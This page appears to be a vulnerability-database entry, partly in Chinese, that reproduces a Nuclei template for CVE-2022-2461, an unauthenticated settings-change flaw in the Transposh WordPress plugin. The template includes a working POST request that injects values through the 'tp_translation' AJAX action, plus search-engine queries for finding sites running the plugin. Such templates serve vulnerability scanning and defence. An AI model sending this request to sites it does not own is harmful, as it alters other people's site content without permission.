CVE-2022-2461: Transposh WordPress Translation <= 1.0.8 - Unauthenticated Settings Change

日期: 2025-08-01 | 影响软件: Transposh WordPress Translation | POC: 已公开

漏洞描述

The Transposh WordPress Translation plugin for WordPress is vulnerable to unauthorized setting changes by unauthenticated users in versions up to, and including, 1.0.8.1. This is due to insufficient permissions checking on the 'tp_translation' AJAX action and default settings which makes it possible for unauthenticated attackers to influence the data shown on the site.

PoC代码[已公开]

id: CVE-2022-2461

info:
  name: Transposh WordPress Translation <= 1.0.8 - Unauthenticated Settings Change
  author: riteshs4hu
  severity: medium
  description: |
    The Transposh WordPress Translation plugin for WordPress is vulnerable to unauthorized setting changes by unauthenticated users in versions up to, and including, 1.0.8.1. This is due to insufficient permissions checking on the 'tp_translation' AJAX action and default settings which makes it possible for unauthenticated attackers to influence the data shown on the site.
  reference:
    - https://wpscan.com/vulnerability/56a961b0-66b7-4dbf-a0e4-0cd38c9aa8dd/
    - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2022-2461.txt
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/223373fc-9d78-47f0-b283-109f8e00b802?source=cve
    - https://www.wordfence.com/vulnerability-advisories/#CVE-2022-2461
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-2461
    cwe-id: CWE-862
    epss-score: 0.27813
    epss-percentile: 0.96272
    cpe: cpe:2.3:a:transposh:transposh_wordpress_translation:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: transposh
    product: transposh_wordpress_translation
    framework: wordpress
    publicwww-query: "/wp-content/plugins/transposh-translation-filter-for-wordpress/"
    fofa-query: body="/wp-content/plugins/transposh-translation-filter-for-wordpress/"
  tags: cve,cve2022,wordpress,wp-plugin,wp,wpscan,transposh-translation-filter-for-wordpress,info-leak,vkev,vuln

variables:
  redirect_uri: "oast.me"

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=tp_translation&ln0=en&sr0={{redirect_uri}}&items=1&tk0={{redirect_uri}}&tr0={{redirect_uri}}

    matchers:
      - type: dsl
        dsl:
          - "contains(body, '200 - backup in sync')"
          - "contains(content_type, 'text/html')"
          - "status_code == 200"
        condition: and

    extractors:
      - type: regex
        part: header
        regex:
          - "Transposh: v-[0-9.]+"
# digest: 490a0046304402203840b89da9fbb0ee2ee672957e2f80b003a5b5158b00d61f85ff1f4acf86a5ca0220446eb7531feb27a63480b047a478bfc595b71f700374ff7618d4945d985c7981:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2022/CVE-2022-2461.yaml

相关漏洞推荐